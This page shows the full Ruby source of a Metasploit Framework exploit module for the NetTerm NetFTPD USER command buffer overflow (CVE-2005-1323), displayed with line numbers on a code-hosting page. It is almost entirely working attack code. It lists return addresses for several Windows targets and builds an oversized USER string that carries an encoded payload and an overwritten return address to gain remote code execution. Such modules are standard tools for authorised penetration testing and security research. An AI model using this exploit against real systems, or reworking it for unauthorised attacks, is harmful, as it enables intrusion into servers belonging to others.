Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/netterm_netftpd_user.rb
19515 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Ftp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'NetTerm NetFTPD USER Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a vulnerability in the NetTerm NetFTPD

18
          application. This package is part of the NetTerm package.

19
          This module uses the USER command to trigger the overflow.

20
        },

21
        'Author' => [ 'hdm' ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2005-1323'],

25
          [ 'OSVDB', '15865'],

26
          [ 'URL', 'https://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'],

27
          [ 'BID', '13396'],

28
        ],

29
        'Privileged' => false,

30
        'Payload' => {

31
          'Space' => 1000,

32
          'BadChars' => "\x00\x0a\x20\x0d",

33
          'StackAdjustment' => -3500,

34
        },

35
        'Platform' => [ 'win' ],

36
        'Targets' => [

37
          [

38
            'NetTerm NetFTPD Universal', # Tested OK - hdm 11/24/2005

39
            {

40
              'Ret' => 0x0040df98, # netftpd.exe (multiple versions)

41
            },

42
          ],

43
          [

44
            'Windows 2000 English',

45
            {

46
              'Ret' => 0x75022ac4, # ws2help.dll

47
            },

48
          ],

49
          [

50
            'Windows XP English SP0/SP1',

51
            {

52
              'Ret' => 0x71aa32ad, # ws2help.dll

53
            },

54
          ],

55
          [

56
            'Windows 2003 English',

57
            {

58
              'Ret' => 0x7ffc0638, # peb magic :-)

59
            },

60
          ],

61
          [

62
            'Windows NT 4.0 SP4/SP5/SP6',

63
            {

64
              'Ret' => 0x77681799, # ws2help.dll

65
            },

66
          ],

67
        ],

68
        'DisclosureDate' => '2005-04-26',

69
        'DefaultTarget' => 0,

70
        'Notes' => {

71
          'Reliability' => UNKNOWN_RELIABILITY,

72
          'Stability' => UNKNOWN_STABILITY,

73
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

74
        }

75
      )

76
    )

77
  end

78


79
  def check

80
    connect

81
    disconnect

82
    if (banner =~ /NetTerm FTP server/)

83
      return Exploit::CheckCode::Detected

84
    end

85


86
    return Exploit::CheckCode::Safe

87
  end

88


89
  def exploit

90
    connect

91


92
    print_status("Trying target #{target.name}...")

93


94
    # U          push ebp

95
    # S          push ebx

96
    # E          inc ebp

97
    # R          push edx

98
    # \x20\xC0   and al, al

99


100
    buf = rand_text_english(8192, payload_badchars)

101
    buf[0, 1] = "\xc0"

102
    buf[1, payload.encoded.length] = payload.encoded

103
    buf[1014, 4] = [ target.ret ].pack('V')

104


105
    send_cmd(["USER #{buf}"])

106
    send_cmd(['HELP'])

107


108
    handler

109
    disconnect

110
  end

111
end

112


113